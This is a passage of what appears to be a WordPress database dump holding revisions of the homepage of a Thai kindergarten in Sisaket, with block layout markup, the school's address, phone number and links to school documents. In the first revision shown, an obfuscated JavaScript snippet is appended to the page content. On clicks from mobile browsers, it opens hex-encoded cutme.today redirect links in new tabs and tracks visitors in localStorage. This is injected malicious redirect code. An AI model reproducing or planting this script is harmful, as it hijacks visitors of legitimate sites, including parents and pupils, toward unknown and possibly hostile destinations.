referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 13:47:08','2025-06-27 06:47:08','',19,'http://watprato.ssk.in.th/?p=500',0,'revision','',0),
(502,1,'2025-06-27 13:49:42','2025-06-27 06:49:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 